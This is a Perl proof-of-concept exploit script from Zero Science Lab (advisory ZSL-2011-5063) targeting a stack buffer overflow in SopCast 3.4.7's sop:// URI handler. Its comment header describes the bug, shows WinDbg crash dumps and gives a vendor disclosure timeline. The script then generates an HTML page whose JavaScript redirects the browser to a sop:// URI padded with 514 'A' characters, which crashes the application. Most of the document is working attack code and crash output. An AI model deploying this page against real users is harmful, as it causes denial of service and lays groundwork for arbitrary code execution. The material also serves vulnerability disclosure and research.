#!/usr/bin/perl # # # SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC # # # Vendor: SopCast.com # Product web page: http://www.sopcast.com # Affected version: 3.4.7.45585 # # Summary: SopCast is a simple, free way to broadcast video and audio or watch # the video and listen to radio on the Internet. Adopting P2P(Peer-to-Peer) # technology, It is very efficient and easy to use. SoP is the abbreviation for # Streaming over P2P. Sopcast is a Streaming Direct Broadcasting System based # on P2P. The core is the communication protocol produced by Sopcast Team, which # is named sop://, or SoP technology. # # Desc: SopCast suffers from a stack-based buffer overflow vulnerability when # parsing the user input using the SoP protocol in sopocx.ocx module allowing # the attacker to gain system access and execute arbitrary code on the affected # machine. The issue is triggered when adding 514 bytes of string to the sop:// # protocol (GET), causing the app to open the link (channel) and crashing. The # application will crash even with 'sop://[anything]' because it fails to properly # sanitize and handle the uri segment, but with exactly 514 bytes the stack gets # overflowed, poping out the Buffer Overrun error box. Unsuccessful atempts causes # denial of service scenario. You can also edit the '<address>' element in the # favorites.xml file as the attack vector. # # # ================================================================================ # # (e50.fcc): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=01092f48 ebx=00f8e8e8 ecx=000000b7 edx=0116a7dc esi=00000001 edi=0104af88 # eip=100a350f esp=0618febc ebp=0618ffa8 iopl=0 nv up ei pl zr na pe nc # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 # *** WARNING: Unable to verify checksum for C:\PROGRA~1\SopCast\sopocx.ocx # *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\PROGRA~1\SopCast\sopocx.ocx - # sopocx!DllUnregisterServer+0x9217f: # 100a350f 0fb606movzx eax,byte ptr [esi] ds:0023:00000001=?? # ... # 0:000> d esp+400 # 0012ea7818 10 ea 00 73 00 6f 00-70 00 3a 00 2f 00 2f 00....s.o.p.:././. # 0012ea8861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 0012ea9861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 0012eaa861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 0012eab861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 0012eac861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 0012ead861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 0012eae861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # ... # 0:008> d edx+1000 # 00f2f8b061 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f2f8c061 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f2f8d061 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f2f8e061 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f2f8f061 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f2f90061 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f2f91061 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f2f92061 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 0:008> d eax+2000 # 00f320e861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f320f861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f3210861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f3211861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f3212861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f3213861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f3214861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # 00f3215861 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00a.a.a.a.a.a.a.a. # # ================================================================================ # # # Tested on: Microsoft Windows XP Professional SP3 (English) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Zero Science Lab - http://www.zeroscience.mk # # # Vendor status: # # [30.11.2011] Vulnerability discovered. # [01.12.2011] Contact with the vendor with sent detailed info. # [04.12.2011] No response from the vendor. # [05.12.2011] Public security advisory released. # # # Advisory ID: ZSL-2011-5063 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5063.php # # # 30.11.2011 # use strict; my $fname = "thricer.html"; print "\n\nooooooooooooooooooooooooooooooooooooooooooooooooo\no"." "x47 ."o\n"; print "o\tSopCast 3.4.7 URI Handling BoF PoC" . " "x6 . "o\no"." "x47 ."o\no\t\t"; print "ID: ZSL-2011-5063"." "x15 ."o\no"." "x47 ."o\n"; print "o\tCopyleft (c) 2011, Zero Science Lab"." "x5 ."o\no"." "x47 ."o\n"; print "ooooooooooooooooooooooooooooooooooooooooooooooooo\n\n"; my $curiosity = "\n</center>\n</body>\n</html>"; my $unknown = "<form>\n<input type=\"button\" value=\"Push The Button!\" "; my $with = "onclick=\"exploit()\" />" . "\n</form>"; my $of = "<body bgcolor=\"#002233\">\n<br /><br />\n<center>\n"; my $fear = "</script>\n</head>\n"; my $replace = "<html>\n<head>\n<title>". "SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer". " Overflow PoC</title>\n". "<script type=\"text/javascript\">\n"; my $code = "window.location.href = \"sop://"."A"x514 ."\";\n"; my $the = "function exploit()\n{\n" . $code . "}\n"; my $payload = $replace.$the.$fear.$of.$unknown.$with.$curiosity; print "\n\n[*] Creating $fname file...\n"; open ENOUGH, ">./$fname" || die "\nCan't open $fname: $!"; print ENOUGH $payload; print "\n"; sleep 1; print "\n[.] File successfully scripted!\n\n"; close ENOUGH;
体验盒子
